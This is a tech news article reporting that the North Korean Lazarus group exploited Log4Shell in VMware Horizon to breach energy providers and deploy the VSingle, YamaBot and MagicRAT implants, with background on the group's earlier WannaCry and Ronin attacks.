Lazarus hackers are using Log4j to hack US energy companies

security
(Image credit: Shutterstock / Song_about_summer)

Energy providers from around the world, including the United States, Canada, and Japan, have reportedly been targeted by state-sponsored North Korean hacker group Lazarus, also known as APT38.

According to Cisco's Talos Intelligence group, the campaign intends to infiltrate organizations around the world in the interests of establishing long-term access and subsequently exfiltrating data of interest to the nation-state.

Although the precise targets have remained unnamed, the attacks once again show the threat that North Korea and Lazarus can pose via destabilization efforts.

How did the attack work?

According to Talos, this campaign involved the exploitation of vulnerabilities in the VMWare Horizon virtual desktop product to gain an initial foothold in targeted organizations.

After gaining successful entry into the targeted enterprise networks, the group then deployed custom malware implants including the HTML bots VSingle and YamaBot.

In addition to these known malware families, they also claimed to discover the use of a previously unknown malware implant called "MagicRAT."

Inital entry in the organizations was reportedly made using Log4Shell (CVE-2021-44228), a zero-day vulnerability in Log4j, a popular Java logging framework, which involves arbitrary code execution.

Cybersecurity company Tenable has previously dubbed Log4Shell "the single biggest, most critical vulnerability ever".

This wouldn't be the first time North Korea has been implicated in attacks on foreign powers; security researchers at Kaspersky Lab have linked North Korea to the Wannacry ransomware attack which disable 300,000 computers in 150 countries and caused the UK's NHS unprecedented issues. 

Since it was founded in 2010, the Lazarus group has certainly been keeping busy if nothing else. Lately, it's been turning its attention towards the world of blockchains and DeFi.

Lazarus was linked to an attack on the Ronin sidechain worth $615 million,  which powers the popular blockchain-integrated game Axie Infinity, which is known as one of the largest DefI hacks to date.

  • Scared of hackers infiltrating your organization? Check out our guide to the best endpoint protection.

Will McCurdy has been writing about technology for over five years. He has a wide range of specialities including cybersecurity, fintech, cryptocurrencies, blockchain, cloud computing, payments, artificial intelligence, retail technology, and venture capital investment. He has previously written for AltFi, FStech, Retail Systems, and National Technology News and is an experienced podcast and webinar host, as well as an avid long-form feature writer.

Read more
Image depicting a hand on a scanner
New Lazarus Group campaign sees North Korean hackers spreading undetectable malware through GitHub and open source packages
Hacker silhouette working on a laptop with North Korean flag on the background
North Korean Lazarus hackers are targeting nuclear workers
A concept image of someone typing on a computer. A red flashing danger sign is above the keyboard and nymbers and symbols also in glowing red surround it.
North Korean Lazarus hackers launch large-scale cyberattack by cloning open source software
North Korean flag with a hooded hacker
North Korean hackers are posing as software development recruiters to target freelancers
Hacker silhouette working on a laptop with North Korean flag on the background
North Korean hackers are targeting LinkedIn jobseekers with new malware - here's how to stay safe
A digital representation of a lock
Looking for a new job? Watch out you don't fall for this new malware scam
Latest in Security
A graphic showing someone on a tablet working through a supply chain.
Security issue in open source software leaves businesses concerned for systems
ransomware avast
One of the most powerful ransomware hacks around has been cracked using some serious GPU power
person at a computer
Infamous ransomware hackers reveal new tool to brute-force VPNs
person at a computer
Many workers are overconfident at spotting phishing attacks
A fish hook is lying across a computer keyboard, representing a phishing attack on a computer system
Microsoft 365 accounts are under attack from new malware spoofing popular work apps
Data Breach
Thousands of healthcare records exposed online, including private patient information
Latest in News
Pebble smartwatch countdown
Pebble confirms its smartwatch announcement is just hours away
Google DeepMind panel discussion
“More sovereignty and protection” - Google goes all-in on UK AI with data residency, upskilling projects, and startup investments
Nintendo Switch 2
Nintendo Switch 2 expected to have AI upscaling and I can't wait to finally play Tears of the Kingdom with upgraded graphics
PowerColor Red Devil AMD RX 9070 XT graphics card shown side-on
Your next GPU could be from AMD, not Nvidia, if Team Red’s success with PC gamers continues
Intel Lunar Lake concept
Intel's Panther Lake processors won't arrive until Q1 2026 - corroborates previous delay rumors despite former Intel CEO's promise of 2025 launch
Quordle on a smartphone held in a hand
Quordle hints and answers for Tuesday, March 18 (game #1149)